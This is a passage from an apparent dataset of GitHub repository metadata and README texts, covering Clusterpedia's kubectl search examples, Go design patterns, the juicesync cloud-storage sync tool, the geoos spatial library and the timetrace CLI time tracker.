1/1 1 1 42d\nclusterpedia-system cluster-1 clusterpedia-apiserver 1/1 1 1 27m\nclusterpedia-system cluster-1 clusterpedia-clustersynchro-manager 1/1 1 1 27m\nclusterpedia-system cluster-1 clusterpedia-internalstorage-mysql 1/1 1 1 29m\nkube-system cluster-1 coredns 2/2 2 2 68d\ntigera-operator cluster-1 tigera-operator 1/1 1 1 68d\n```\nExcept for `search.clusterpedia.io/clusters`, the support for other complex queries is same as that for multi-cluster search.\n\nIf you want to learn about the details of a resource, you need to specify which cluster it is:\n```sh\n$ kubectl --cluster cluster-1 -n kube-system get deployments coredns -o wide\nCLUSTER NAME READY UP-TO-DATE AVAILABLE AGE CONTAINERS IMAGES SELECTOR\ncluster-1 coredns 2/2 2 2 68d coredns registry.aliyuncs.com/google_containers/coredns:v1.8.4 k8s-app=kube-dns\n```\n\n**Find the related pods by the name of the deployment**\n\nFirst view the deployments in default namespace\n```sh\n$ kubectl --cluster cluster-1 get deployments\nNAME READY UP-TO-DATE AVAILABLE AGE\nfake-pod 3/3 3 3 104d\ntest-controller-manager 0/0 0 0 7d21h\n```\n\nUse `owner-name` to specify Owner Name and use `owner-seniority` to promote the Owner's seniority.\n```\n$ kubectl --cluster cluster-1 get pods -l \"search.clusterpedia.io/owner-name=fake-pod,search.clusterpedia.io/owner-seniority=1\" \nNAME READY STATUS RESTARTS AGE\nfake-pod-698dfbbd5b-74cjx 1/1 Running 0 12d\nfake-pod-698dfbbd5b-tmcw7 1/1 Running 0 3s\nfake-pod-698dfbbd5b-wvtvw 1/1 Running 0 3s\n```\n\nLean More About [Search 
by Parent or Ancestor Owner](https://clusterpedia.io/docs/usage/search/specified-cluster/#search-by-parent-or-ancestor-owner)\n\n### Search for [Collection Resource](https://clusterpedia.io/docs/concepts/collection-resource/)\nClusterpedia can also perform more advanced aggregation of resources. For example, you can use a `Collection Resource` to get a set of different resources at once.\n\nLet's first check which `Collection Resources` Clusterpedia currently supports:\n```sh\n$ kubectl get collectionresources\nNAME RESOURCES\nany *\nworkloads deployments.apps,daemonsets.apps,statefulsets.apps\nkuberesources .*,*.admission.k8s.io,*.admissionregistration.k8s.io,*.apiextensions.k8s.io,*.apps,*.authentication.k8s.io,*.authorization.k8s.io,*.autoscaling,*.batch,*.certificates.k8s.io,*.coordination.k8s.io,*.discovery.k8s.io,*.events.k8s.io,*.extensions,*.flowcontrol.apiserver.k8s.io,*.imagepolicy.k8s.io,*.internal.apiserver.k8s.io,*.networking.k8s.io,*.node.k8s.io,*.policy,*.rbac.authorization.k8s.io,*.scheduling.k8s.io,*.storage.k8s.io\n```\n\nBy getting workloads, you get a set of resources aggregated from `deployments`, `daemonsets`, and `statefulsets`, and `Collection Resource` also supports all complex queries.\n\n**`kubectl get collectionresources workloads` will get the corresponding resources of all namespaces in all clusters by default:**\n```sh\n$ kubectl get collectionresources workloads\nCLUSTER GROUP VERSION KIND NAMESPACE NAME AGE\ncluster-1 apps v1 DaemonSet kube-system vsphere-cloud-controller-manager 63d\ncluster-2 apps v1 Deployment kube-system calico-kube-controllers 109d\ncluster-2 apps v1 Deployment kube-system coredns-coredns 109d\n```\n> A DaemonSet in cluster-1 has been added to the collection, and some of the above output is omitted.\n\nDue to kubectl limitations, complex queries cannot be expressed with kubectl; they can only be issued via `URL Query`.\n\n[Learn More](https://clusterpedia.io/docs/usage/search/collection-resource/)\n\n## Proposals\n### Perform more complex control over resources\nIn addition to resource search, and similar to Wikipedia, Clusterpedia should also provide simple resource control capabilities, such as watch, create, delete, update, and more.\n\nIn practice, a write action is implemented as a double write plus a warning response.\n\n**We will discuss this feature and decide whether to implement it according to community needs.**\n\n## Notes\n### Multi-cluster network connectivity\nClusterpedia does not actually solve the problem of network connectivity in a multi-cluster environment. You can use tools such as [tower](https://github.com/kubesphere/tower) to connect and access sub-clusters, or use [submariner](https://github.com/submariner-io/submariner) or [skupper](https://github.com/skupperproject/skupper) to solve cross-cluster network problems.\n\n## Contact \nIf you have any questions, feel free to reach out to us in the following ways:\n* [@cncf/clusterpedia slack](https://cloud-native.slack.com/messages/clusterpedia)\n\n> If you want to join the clusterpedia channel on CNCF slack, please **[get invite to CNCF slack](https://slack.cncf.io/)** and then join the [#clusterpedia](https://cloud-native.slack.com/messages/clusterpedia) channel.\n\n## Contributors\n\nMade with [contrib.rocks](https://contrib.rocks).\n\n## License\nCopyright 2022 the Clusterpedia Authors. 
All rights reserved.\n\nLicensed under the Apache License, Version 2.0.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "bvwells/go-patterns", "link": "https://github.com/bvwells/go-patterns", "tags": ["golang", "go", "design-patterns", "patterns", "idioms"], "stars": 550, "description": "Design patterns for the Go programming language", "lang": "Go", "repo_lang": "", "readme": "# Design Patterns for Go\n \n[![go.dev reference](https://img.shields.io/badge/go.dev-reference-007d9c?logo=go&logoColor=white&style=flat-square)](https://pkg.go.dev/github.com/bvwells/go-patterns?tab=overview)\n![GitHub go.mod Go version](https://img.shields.io/github/go-mod/go-version/bvwells/go-patterns)\n![GitHub release (latest SemVer)](https://img.shields.io/github/v/release/bvwells/go-patterns) \n[![Build Status](https://app.travis-ci.com/bvwells/go-patterns.svg?branch=master)](https://app.travis-ci.com/bvwells/go-patterns)\n[![Build status](https://ci.appveyor.com/api/projects/status/ea2u4hpy555b6ady?svg=true)](https://ci.appveyor.com/project/bvwells/go-patterns)\n[![codecov](https://codecov.io/gh/bvwells/go-patterns/branch/master/graph/badge.svg)](https://codecov.io/gh/bvwells/go-patterns)\n[![Go Report Card](https://goreportcard.com/badge/github.com/bvwells/go-patterns)](https://goreportcard.com/report/github.com/bvwells/go-patterns)\n\nDesign patterns for the Go programming language.\n\n![Gopher jigsaw](jigsaw.png)\n\n``` go\nimport \"github.com/bvwells/go-patterns\"\n```\n\nTo install the packages on your system,\n\n```\n$ go get -u github.com/bvwells/go-patterns/...\n```\n\nDocumentation and examples are available at https://pkg.go.dev/github.com/bvwells/go-patterns?tab=overview\n\n * [Design Patterns](#design-patterns)\n * [Creational](#creational)\n * [Structural](#structural)\n * [Behavioral](#behavioral)\n * [Go Versions Supported](#go-versions-supported)\n\n## Design Patterns\n\nPattern | Package | Description\n-----------|-------------------------------------------|------------\nCreational | [`creational`][creational-ref] | Creational design patterns are design patterns that deal with object creation mechanisms, trying to create objects in a manner suitable to the situation. The basic form of object creation could result in design problems or in added complexity to the design. Creational design patterns solve this problem by somehow controlling this object creation.\nStructural | [`structural`][structural-ref] | Structural design patterns are design patterns that ease the design by identifying a simple way to realize relationships between entities.\nBehavioral | [`behavioral`][behavioral-ref] | Behavioral design patterns are design patterns that identify common communication patterns between objects and realize these patterns. 
By doing so, these patterns increase flexibility in carrying out this communication.\n\n## Creational [![go.dev reference](https://img.shields.io/badge/go.dev-reference-007d9c?logo=go&logoColor=white&style=flat-square)](https://pkg.go.dev/github.com/bvwells/go-patterns/creational?tab=overview)\n\nName | Description \n-----------|-------------------------------------------\n[`Abstract Factory`](./creational/abstract_factory.go) | Provide an interface for creating families of related or dependent objects without specifying their concrete classes.\n[`Builder`](./creational/builder.go) | Separate the construction of a complex object from its representation, allowing the same construction process to create various representations.\n[`Factory Method`](./creational/factory_method.go) | Define an interface for creating a single object, but let subclasses decide which class to instantiate. Factory Method lets a class defer instantiation to subclasses.\n[`Object Pool`](./creational/object_pool.go) | Avoid expensive acquisition and release of resources by recycling objects that are no longer in use. Can be considered a generalisation of connection pool and thread pool patterns.\n[`Prototype`](./creational/prototype.go) | Specify the kinds of objects to create using a prototypical instance, and create new objects from the 'skeleton' of an existing object, thus boosting performance and keeping memory footprints to a minimum.\n[`Singleton`](./creational/singleton.go) | Ensure a class has only one instance, and provide a global point of access to it.\n\n## Structural [![go.dev reference](https://img.shields.io/badge/go.dev-reference-007d9c?logo=go&logoColor=white&style=flat-square)](https://pkg.go.dev/github.com/bvwells/go-patterns/structural?tab=overview)\n\nName | Description \n-----------|-------------------------------------------\n[`Adapter`](./structural/adapter.go) | Convert the interface of a class into another interface clients expect. An adapter lets classes work together that could not otherwise because of incompatible interfaces. The enterprise integration pattern equivalent is the translator.\n[`Bridge`](./structural/bridge.go) | Decouple an abstraction from its implementation allowing the two to vary independently.\n[`Composite`](./structural/composite.go) | Compose objects into tree structures to represent part-whole hierarchies. Composite lets clients treat individual objects and compositions of objects uniformly.\n[`Decorator`](./structural/decorator.go) | Attach additional responsibilities to an object dynamically keeping the same interface. Decorators provide a flexible alternative to subclassing for extending functionality.\n[`Facade`](./structural/facade.go) | Provide a unified interface to a set of interfaces in a subsystem. 
Facade defines a higher-level interface that makes the subsystem easier to use.\n[`Flyweight`](./structural/flyweight.go) | Use sharing to support large numbers of similar objects efficiently.\n[`Proxy`](./structural/proxy.go) | Provide a surrogate or placeholder for another object to control access to it.\n\n## Behavioral [![go.dev reference](https://img.shields.io/badge/go.dev-reference-007d9c?logo=go&logoColor=white&style=flat-square)](https://pkg.go.dev/github.com/bvwells/go-patterns/behavioral?tab=overview)\n\nName | Description \n-----------|-------------------------------------------\n[`Chain of Responsibility`](./behavioral/chain_of_responsibility.go) | Avoid coupling the sender of a request to its receiver by giving more than one object a chance to handle the request. Chain the receiving objects and pass the request along the chain until an object handles it.\n[`Command`](./behavioral/command.go) | Encapsulate a request as an object, thereby allowing for the parameterization of clients with different requests, and the queuing or logging of requests. It also allows for the support of undoable operations.\n[`Interpreter`](./behavioral/interpreter.go) | Given a language, define a representation for its grammar along with an interpreter that uses the representation to interpret sentences in the language.\n[`Iterator`](./behavioral/iterator.go) | Provide a way to access the elements of an aggregate object sequentially without exposing its underlying representation.\n[`Mediator`](./behavioral/mediator.go) | Define an object that encapsulates how a set of objects interact. Mediator promotes loose coupling by keeping objects from referring to each other explicitly, and it allows their interaction to vary independently.\n[`Memento`](./behavioral/memento.go) | Without violating encapsulation, capture and externalize an object's internal state allowing the object to be restored to this state later.\n[`Observer`](./behavioral/observer.go) | Define a one-to-many dependency between objects where a state change in one object results in all its dependents being notified and updated automatically.\n[`State`](./behavioral/state.go) | Allow an object to alter its behavior when its internal state changes. The object will appear to change its class.\n[`Strategy`](./behavioral/strategy.go) | Define a family of algorithms, encapsulate each one, and make them interchangeable. Strategy lets the algorithm vary independently from clients that use it.\n[`Template Method`](./behavioral/template_method.go) | Define the skeleton of an algorithm in an operation, deferring some steps to subclasses. Template method lets subclasses redefine certain steps of an algorithm without changing the algorithm's structure.\n[`Visitor`](./behavioral/visitor.go) | Represent an operation to be performed on the elements of an object structure. Visitor lets a new operation be defined without changing the classes of the elements on which it operates.\n\n## Go Versions Supported\n\nThe most recent major version of Go is supported. 
You can see which versions are\ncurrently supported by looking at the lines following `go:` in\n[`.travis.yml`](.travis.yml).\n\n[creational-ref]: https://pkg.go.dev/github.com/bvwells/go-patterns/creational?tab=overview\n[structural-ref]: https://pkg.go.dev/github.com/bvwells/go-patterns/structural?tab=overview\n[behavioral-ref]: https://pkg.go.dev/github.com/bvwells/go-patterns/behavioral?tab=overview\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "juicedata/juicesync", "link": "https://github.com/juicedata/juicesync", "tags": [], "stars": 550, "description": "A tool to move your data between any clouds or regions.", "lang": "Go", "repo_lang": "", "readme": "# juicesync\n\n![build](https://github.com/juicedata/juicesync/workflows/build/badge.svg) ![release](https://github.com/juicedata/juicesync/workflows/release/badge.svg)\n\n`juicesync` is a tool to copy your data in object storage between any clouds or regions; it also supports local disk, SFTP, HDFS and many more.\n\nThis tool shares code with [`juicefs sync`](https://github.com/juicedata/juicefs), so if you are already using JuiceFS Community Edition, you should use `juicefs sync` instead.\n\nDue to release planning, `juicesync` may not contain the latest features and bug fixes of `juicefs sync`.\n\n## How does it work\n\n`juicesync` scans all the keys from the two object stores and compares them in ascending order to find missing or outdated keys, then downloads them from the source and uploads them to the destination in parallel.\n\n## Install\n\n### Homebrew\n\n```sh\nbrew install juicedata/tap/juicesync\n```\n\n### Binary release\n\nDownload from [here](https://github.com/juicedata/juicesync/releases)\n\n## Build from source\n\nJuicesync requires Go 1.16+ to build:\n\n```sh\ngo get github.com/juicedata/juicesync\n```\n\n## Upgrade\n\nPlease choose the upgrade method that matches how you installed juicesync:\n\n* Use Homebrew to upgrade\n* Download a new version from the [release page](https://github.com/juicedata/juicesync/releases)\n\n## Usage\n\nPlease check the [`juicefs sync` command documentation](https://juicefs.com/docs/community/administration/sync) for detailed usage.\n\nSRC and DST must be a URI of one of the following object storages:\n\n- file: local disk\n- sftp: FTP via SSH\n- s3: Amazon S3\n- hdfs: Hadoop File System (HDFS)\n- gcs: Google Cloud Storage\n- wasb: Azure Blob Storage\n- oss: Alibaba Cloud OSS\n- cos: Tencent Cloud COS\n- ks3: Kingsoft KS3\n- ufile: UCloud US3\n- qingstor: Qing Cloud QingStor\n- bos: Baidu Cloud Object Storage\n- qiniu: Qiniu Object Storage\n- b2: Backblaze B2\n- space: DigitalOcean Space\n- obs: Huawei Cloud OBS\n- oos: CTYun OOS\n- scw: Scaleway Object Storage\n- minio: MinIO\n- scs: Sina Cloud Storage\n- wasabi: Wasabi Object Storage\n- ibmcos: IBM Cloud Object Storage\n- webdav: WebDAV\n- tikv: TiKV\n- redis: Redis\n- mem: In-memory object store\n\nPlease check the full supported list [here](https://juicefs.com/docs/community/how_to_setup_object_storage#supported-object-storage).\n\nSRC and DST should be in the following format:\n\n[NAME://][ACCESS_KEY:SECRET_KEY@]BUCKET[.ENDPOINT][/PREFIX]\n\nSome examples:\n\n- `local/path`\n- `user@host:port:path`\n- `file:///Users/me/code/`\n- `hdfs://hdfs@namenode1:9000,namenode2:9000/user/`\n- `s3://my-bucket/`\n- `s3://access-key:secret-key-id@my-bucket/prefix`\n- `wasb://account-name:account-key@my-container/prefix`\n- `gcs://my-bucket.us-west1.googleapi.com/`\n- `oss://test`\n- `cos://test-1234`\n- `obs://my-bucket`\n- `bos://my-bucket`\n- `minio://myip:9000/bucket`\n- `scs://access-key:secret-key-id@my-bucket.sinacloud.net/prefix`\n- `webdav://host:port/prefix`\n- `tikv://host1:port,host2:port,host3:port/prefix`\n- `redis://localhost/1`\n- `mem://`\n
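\nFor instance, a minimal end-to-end invocation mirrors the `juicesync [src] [dst]` form used in the sftp note below. The bucket names are placeholders and the credentials are dummies; for S3 they come from the environment variables mentioned in the notes, while for OSS they are embedded in the URI:\n```sh\nexport AWS_ACCESS_KEY_ID=AKIAXXXXXXXXXXXX\nexport AWS_SECRET_ACCESS_KEY=xxxxxxxxxxxx\njuicesync s3://my-src-bucket/backup/ oss://access-key:secret-key@my-dst-bucket/backup/\n```\n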
\nNote:\n\n- It's recommended to run juicesync in the target region for better performance.\n- Endpoints are discovered automatically for S3, OSS, COS, OBS and BOS buckets, so `SRC` and `DST` can use the format `NAME://[ACCESS_KEY:SECRET_KEY@]BUCKET[/PREFIX]`. `ACCESS_KEY` and `SECRET_KEY` can be provided by the corresponding environment variables (see below).\n- If \"/\" appears in `ACCESS_KEY` or `SECRET_KEY`, you need to replace \"/\" with \"%2F\".\n- S3:\n * The access key and secret key for S3 can be provided by `AWS_ACCESS_KEY_ID` and `AWS_SECRET_ACCESS_KEY`, or an *IAM* role.\n- Wasb (Windows Azure Storage Blob)\n * The account name and account key can be provided as a [connection string](https://docs.microsoft.com/en-us/azure/storage/common/storage-configure-connection-string#configure-a-connection-string-for-an-azure-storage-account) via `AZURE_STORAGE_CONNECTION_STRING`.\n- GCS: The machine should be authorized to access Google Cloud Storage.\n- OSS:\n * The credential can be provided by the environment variables `ALICLOUD_ACCESS_KEY_ID` and `ALICLOUD_ACCESS_KEY_SECRET`, a RAM role, or [EMR MetaService](https://help.aliyun.com/document_detail/43966.html).\n- COS:\n * The AppID should be part of the bucket name.\n * The credential can be provided by the environment variables `COS_SECRETID` and `COS_SECRETKEY`.\n- OBS:\n * The credential can be provided by the environment variables `HWCLOUD_ACCESS_KEY` and `HWCLOUD_SECRET_KEY`.\n- BOS:\n * The credential can be provided by the environment variables `BDCLOUD_ACCESS_KEY` and `BDCLOUD_SECRET_KEY`.\n- Qiniu:\n The S3 endpoint should be used for Qiniu, for example, abc.cn-north-1-s3.qiniu.com.\n If there are keys starting with \"/\", the domain should be provided as `QINIU_DOMAIN`.\n- sftp: if your target machine uses SSH certificates instead of a password, you should pass the path to your private key file in the environment variable `SSH_PRIVATE_KEY_PATH`, like ` SSH_PRIVATE_KEY_PATH=/home/someuser/.ssh/id_rsa juicesync [src] [dst]`.\n- Scaleway:\n * The credential can be provided by the environment variables `SCW_ACCESS_KEY` and `SCW_SECRET_KEY`.\n- MinIO:\n * The credential can be provided by the environment variables `MINIO_ACCESS_KEY` and `MINIO_SECRET_KEY`.\n", "readme_type": "markdown", "hn_comments": "This looks like a clone of rclone that supports fewer services, built by a company whose main product is a proprietary filesystem.I'm wondering how this is better than rclone?Hello,\nWhat is the benefits comparing with rclone? 
I think rclone can do much much more and also free and open source", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "spatial-go/geoos", "link": "https://github.com/spatial-go/geoos", "tags": ["geometry-library", "gis", "geospatial", "golang"], "stars": 550, "description": "A library that provides spatial data and geometric algorithms", "lang": "Go", "repo_lang": "", "readme": "# Geoos\nOur organization `spatial-go` has been formally established, and `Geoos` is our first open-source project. `Geoos` provides spatial data types and geometric algorithms, implemented and packaged in the `Go` language.\nYou are welcome to use it and to share your valuable feedback!\n\n## Table of Contents\n - [Table of Contents](#table-of-contents)\n - [Directory Structure](#directory-structure)\n - [Usage](#usage)\n - [Maintainers](#maintainers)\n - [Contributing](#contributing)\n - [License](#license)\n\n\n\n## Directory Structure\n1. `algorithm` defines the spatial operations exposed to callers.\n2. `strategy.go` defines how the underlying algorithm for a spatial operation is selected.\n\n## Usage\nTake computing an area (`Area`) as an example.\n```\npackage main\n\nimport (\n\t\"bytes\"\n\t\"fmt\"\n\n\t\"github.com/spatial-go/geoos/geoencoding\"\n\t\"github.com/spatial-go/geoos/planar\"\n)\n\nfunc main() {\n\t// First, choose the default algorithm.\n\tstrategy := planar.NormalStrategy()\n\t// Second, construct test data and convert it to a geometry.\n\tconst polygon = `POLYGON((-1 -1, 1 -1, 1 1, -1 1, -1 -1))`\n\t// geometry, _ := wkt.UnmarshalString(polygon)\n\n\tbuf0 := new(bytes.Buffer)\n\tbuf0.Write([]byte(polygon))\n\tgeometry, _ := geoencoding.Read(buf0, geoencoding.WKT)\n\n\t// Last, call the Area() method and get the result.\n\tarea, e := strategy.Area(geometry)\n\tif e != nil {\n\t\tfmt.Printf(e.Error())\n\t}\n\tfmt.Printf(\"%f\", area)\n\t// get result 4.0\n}\n```\nExample: geoencoding\n[example_encoding.go](https://github.com/spatial-go/geoos/example/example_encoding.go)\n\n## Maintainers\n\n[@spatial-go](https://github.com/spatial-go).\n\n\n## Contributing\n\nWe will uphold the ideals of \"openness, co-creation, and win-win\" and contribute our share to the field of spatial computing.\n\nYou are very welcome to join us! [Open an issue](https://github.com/spatial-go/geoos/issues/new)\n\nContact email: [geoos@changjing.ai](mailto:geoos@changjing.ai)\n\n## License\n\n[LGPL-2.1](LICENSE)", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "dominikbraun/timetrace", "link": "https://github.com/dominikbraun/timetrace", "tags": ["time-tracker", "timetracker", "time-tracking", "cli", "timetracking", "hacktoberfest"], "stars": 550, "description": "A simple CLI for tracking your working time.", "lang": "Go", "repo_lang": "", "readme": "

:alarm_clock: timetrace\n\n\n\n\n

\n\n> timetrace is a simple CLI for tracking your working time.\n\n![CLI screenshot 64x16](timetrace.png)\n\n:fire: **New:** [Add tags for records](#start-tracking) \n:fire: **New:** [Use decimal hours when displaying durations](#prefer-decimal-hours-for-status-and-reports) \n:fire: **New:** [Restore records when restoring the associated project](#delete-a-project) \n:fire: **New:** [Support for per-project configuration](#per-project-configuration) \n\n---\n\n- [Installation](#installation)\n - [Homebrew](#homebrew)\n - [Snap](#snap)\n - [AUR](#aur)\n - [Scoop](#scoop)\n - [Docker](#docker)\n - [Binary](#binary)\n- [Usage example](#usage-example)\n - [Project modules](#project-modules)\n- [Shell integration](#shell-integration)\n - [Starship](#starship)\n- [Command reference](#command-reference)\n - [Start tracking](#start-tracking)\n - [Print the tracking status](#print-the-tracking-status)\n - [Stop tracking](#stop-tracking)\n - [Create a project](#create-a-project)\n - [Create a record](#create-a-record)\n - [Get a project](#get-a-project)\n - [Get a record](#get-a-record)\n - [List all projects](#list-all-projects)\n - [List all records from a date](#list-all-records-from-a-date)\n - [Edit a project](#edit-a-project)\n - [Edit a record](#edit-a-record)\n - [Delete a project](#delete-a-project)\n - [Delete a record](#delete-a-record)\n - [Generate a report `[beta]`](#generate-a-report-beta)\n - [Print version information](#print-version-information)\n- [Configuration](#configuration)\n - [Prefer 12-hour clock for storing records](#prefer-12-hour-clock-for-storing-records)\n - [Prefer decimal hours for status and reports](#prefer-decimal-hours-for-status-and-reports)\n - [Set your preferred editor](#set-your-preferred-editor)\n - [Configure defaults for projects](#configure-defaults-for-projects)\n- [Credits](#credits)\n\n---\n\n## Installation\n\n### Homebrew\n\n```\nbrew tap dominikbraun/timetrace\nbrew install timetrace\n```\n\n### Snap\n\n```\nsudo snap install timetrace --edge --devmode\n```\n\n### AUR\n\n```\nyay -S timetrace-bin\n```\n\n### Scoop\n\n```\nscoop bucket add https://github.com/Br1ght0ne/scoop-bucket\nscoop install timetrace\n```\n\n### Docker\n\nThe timetrace Docker image stores all data in the `/data` directory. To persist\nthis data on disk, you should create a bind mount or named volume like so:\n\n```\ndocker container run -v my-volume:/data dominikbraun/timetrace version\n```\n\n### Binary\n\nDownload the [latest release](https://github.com/dominikbraun/timetrace/releases)\nand extract the binary into a directory like `/usr/local/bin` or\n`C:\\Program Files\\timetrace`. Make sure the directory is in the `PATH` variable.\n\n## Usage example\n\nFirst, create a project you're working for:\n\n```\ntimetrace create project make-coffee\n```\n\nOnce the project is created, you're able to track work on that project.\n\n```\ntimetrace start make-coffee\n```\n\nYou can obtain your currently worked time using `timetrace status`. When you've\nfinished your work, stop tracking:\n\n```\ntimetrace stop\n```\n\n### Project modules\n\nTo refine what part of a project you're working on, timetrace supports _project modules_. 
These are the exact same thing\nas normal projects, except that they have a key in the form `@`.\n\nCreating a `grind-beans` module for the `make-coffee` project is simple:\n\n```\ntimetrace create project grind-beans@make-coffee\n```\n\nThe new module will be listed as part of the `make-coffee` project:\n\n```\ntimetrace list projects\n+-----+-------------+-------------+\n| # | KEY | MODULES |\n+-----+-------------+-------------+\n| 1 | make-coffee | grind-beans |\n+-----+-------------+-------------+\n\n```\n\nWhen filtering by projects, for example with `timetrace list records -p make-coffee today`, the modules of that project\nwill be included.\n\n## Shell integration\n\n### Starship\n\nTo integrate timetrace into Starship, add the following lines to `$HOME/.config/starship.toml`:\n\n```\n[custom.timetrace]\ncommand = \"\"\" timetrace status --format \"Current project: {project} - Worked today: {trackedTimeToday}\" \"\"\"\nwhen = \"timetrace status\"\nshell = \"sh\"\n```\n\nYou can find a list of available formatting variables in the [`status` reference](#print-the-tracking-status).\n\n## Command reference\n\n### Start tracking\n\n**Syntax:**\n\n```\ntimetrace start [+TAG1, +TAG2, ...]\n```\n\n**Arguments:**\n\n| Argument | Description |\n| ------------------- | -------------------------------------------- |\n| `PROJECT KEY` | The key of the project. |\n| `+TAG1, +TAG2, ...` | One or more optional tags starting with `+`. |\n\n**Flags:**\n\n| Flag | Short | Description |\n| ---------------- | ----- | ---------------------------------------------------------------------------------------------------------- |\n| `--billable` | `-b` | Mark the record as billable. |\n| `--non-billable` | | Mark the record as non-billable, even if the project is [billable by default](#per-project-configuration). |\n\n**Example:**\n\nStart working on a project called `make-coffee` and mark it as billable:\n\n```\ntimetrace start --billable make-coffee\n```\n\nStart working on the `make-coffee` project and add two tags:\n\n```\ntimetrace start make-coffee +espresso +morning\n```\n\n### Print the tracking status\n\n**Syntax:**\n\n```\ntimetrace status\n```\n\n**Flags:**\n\n| Flag | Short | Description |\n| ---------- | ----- | ------------------------------------------------------------- |\n| `--format` | `-f` | Display the status in a custom format (see below). |\n| `--output` | `-o` | Display the status in a specific output. Valid values: `json` |\n\n**Formatting variables:**\n\nThe names of the formatting variables are the same as the JSON keys printed by `--output json`.\n\n| Variable | Description |\n| ---------------------- | ---------------------------------------- |\n| `{project}` | The key of the current project. |\n| `{trackedTimeCurrent}` | The time tracked for the current record. |\n| `{trackedTimeToday}` | The time tracked today. |\n| `{breakTimeToday}` | The break time since the first record. |\n\n**Example:**\n\nPrint the current tracking status:\n\n```\ntimetrace status\n+-------------------+----------------------+----------------+\n| CURRENT PROJECT | WORKED SINCE START | WORKED TODAY |\n+-------------------+----------------------+----------------+\n| make-coffee | 1h 15min | 4h 30min |\n+-------------------+----------------------+----------------+\n```\n\nPrint the current project and the total working time as a custom string. 
Given the example above, the output will be\n`Current project: make-coffee - Worked today: 3h 30min`.\n\n```\ntimetrace status --format \"Current project: {project} - Worked today: {trackedTimeToday}\"\n```\n\nPrint the status as JSON:\n\n```\ntimetrace status -o json\n```\n\nThe output will look as follows:\n\n```json\n{\n \"project\": \"web-store\",\n \"trackedTimeCurrent\": \"1h 45min\",\n \"trackedTimeToday\": \"7h 30min\",\n \"breakTimeToday\": \"0h 30min\"\n}\n```\n\n### Stop tracking\n\n**Syntax:**\n\n```\ntimetrace stop\n```\n\n**Example:**\n\nStop working on your current project:\n\n```\ntimetrace stop\n```\n\n### Create a project\n\n**Syntax:**\n\n```\ntimetrace create project \n```\n\n**Arguments:**\n\n| Argument | Description |\n| -------- | ---------------------- |\n| `KEY` | An unique project key. |\n\n**Example:**\n\nCreate a project called `make-coffee`:\n\n```\ntimetrace create project make-coffee\n```\n\n### Create a record\n\n:warning: You shouldn't use this command for normal tracking but only for belated records.\n\n**Syntax:**\n\n```\ntimetrace create record {|today|yesterday} \n```\n\n**Arguments:**\n\n| Argument | Description |\n| ------------- | -------------------------------------------------------------------------------- |\n| `PROJECT KEY` | The project key the record should be created for. |\n| `YYYY-MM-DD` | The date the record should be created for. Alternatively `today` or `yesterday`. |\n| `HH:MM` | The start time of the record. |\n| `HH:MM` | The end time of the record. |\n\n**Example:**\n\nCreate a record for the `make-coffee` project today from 07:00 to 08:30:\n\n```\ntimetrace create record make-coffee today 07:00 08:30\n```\n\n### Get a project\n\n**Syntax:**\n\n```\ntimetrace get project \n```\n\n**Arguments:**\n\n| Argument | Description |\n| -------- | ---------------- |\n| `KEY` | The project key. |\n\n**Example:**\n\nDisplay a project called `make-coffee`:\n\n```\ntimetrace get project make-coffee\n```\n\n### Get a record\n\n**Syntax:**\n\n```\ntimetrace get record \n```\n\n**Arguments:**\n\n| Argument | Description |\n| ------------------ | ------------------------------------- |\n| `YYYY-MM-DD-HH-MM` | The start time of the desired record. |\n\n**Example:**\n\nBy default, records can be accessed using the 24-hour format, meaning 3:00 PM is 15. Display a record created on May 1st 2021, 3:00 PM:\n\n```\ntimetrace get record 2021-05-01-15-00\n```\n\nThis behavior [can be changed](#prefer-12-hour-clock-for-storing-records).\n\n### List all projects\n\n**Syntax:**\n\n```\ntimetrace list projects\n```\n\n**Example:**\n\nList all projects stored within the timetrace filesystem:\n\n```\ntimetrace list projects\n+---+-------------+\n| # | KEY |\n+---+-------------+\n| 1 | make-coffee |\n| 2 | my-website |\n| 3 | web-shop |\n+---+-------------+\n```\n\n### List all records from a date\n\n**Syntax:**\n\n```\ntimetrace list records {|today|yesterday}\n```\n\n**Arguments:**\n\n| Argument | Description |\n| ------------ | ----------------------------------------------------------- |\n| `YYYY-MM-DD` | The date of the records to list, or `today` or `yesterday`. |\n| today | List today's records. |\n| yesterday | List yesterday's records. |\n\n**Flags:**\n\n| Flag | Short | Description |\n| ------------ | ----- | ------------------------------ |\n| `--billable` | `-b` | only display billable records. |\n| `--project` | `-p` | filter records by project key. 
|\n\n**Example:**\n\nDisplay all records created on May 1st 2021:\n\n```\ntimetrace list records 2021-05-01\n+-----+-------------+---------+-------+------------+\n| # | PROJECT | START | END | BILLABLE |\n+-----+-------------+---------+-------+------------+\n| 1 | my-website | 17:30 | 21:00 | yes |\n| 2 | my-website | 08:31 | 17:00 | no |\n| 3 | make-coffee | 08:25 | 08:30 | no |\n+-----+-------------+---------+-------+------------+\n```\n\nFilter records by the `make-coffee` project:\n\n```\ntimetrace list records -p make-coffee 2021-05-01\n+-----+-------------+---------+-------+------------+\n| # | PROJECT | START | END | BILLABLE |\n+-----+-------------+---------+-------+------------+\n| 1 | make-coffee | 08:25 | 08:30 | no |\n+-----+-------------+---------+-------+------------+\n```\n\nThis will include records for [project modules](#project-modules) like `grind-beans@make-coffee`.\n\n### Edit a project\n\n**Syntax:**\n\n```\ntimetrace edit project \n```\n\n**Arguments:**\n\n| Argument | Description |\n| -------- | ---------------- |\n| `KEY` | The project key. |\n\n**Flags:**\n| Flag | Short | Description |\n| ---------- | ----- | ------------------------------------------------------- |\n| `--revert` | `-r` | Revert the project to its state prior to the last edit. |\n\n**Example:**\n\nEdit a project called `make-coffee`:\n\n```\ntimetrace edit project make-coffee\n```\n\n:fire: **New:** Restore the project to its state prior to the last edit:\n\n```\ntimetrace edit project make-coffee --revert\n```\n\n### Edit a record\n\n**Syntax:**\n\n```\ntimetrace edit record {|latest}\n```\n\n**Arguments:**\n\n| Argument | Description |\n| -------- | ------------------------------------------------------------------------------------------------------------------------------------------- |\n| `KEY` | The project key. `YYYY-MM-DD-HH-MM` by default or `YYYY-MM-DD-HH-MMPM` if [`use12hours` is 